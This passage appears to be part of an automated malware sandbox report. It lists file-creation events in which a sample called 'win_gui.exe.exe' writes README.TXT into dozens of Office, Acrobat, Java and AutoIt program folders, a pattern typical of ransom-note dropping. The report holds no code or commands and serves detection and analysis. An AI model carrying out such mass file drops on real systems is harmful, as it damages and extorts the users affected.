Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\cursors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\Backgrounds\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\DataServices\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBFTSCM\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBSPAPR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\QuickStyles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\GettingStarted16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\private\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\DESIGNER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power Map Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power View Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Sort\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Style\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\en\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\Analysis\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\SOLVER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\Images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\bg\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ca\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\cs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\da\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\el\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\et\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\eu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\gl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\he\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\id\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ja\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\kk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ko\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ms\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt-BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-BA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Latn-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\th\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\uk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\vi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\Salesforce\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\SearchView\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000002\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000018\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000027\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000042\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000043\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000049\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000054\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000058\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000062\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000063\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000068\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000069\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000070\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000072\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000076\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000079\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000083\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000084\README.TXTJump to behavior
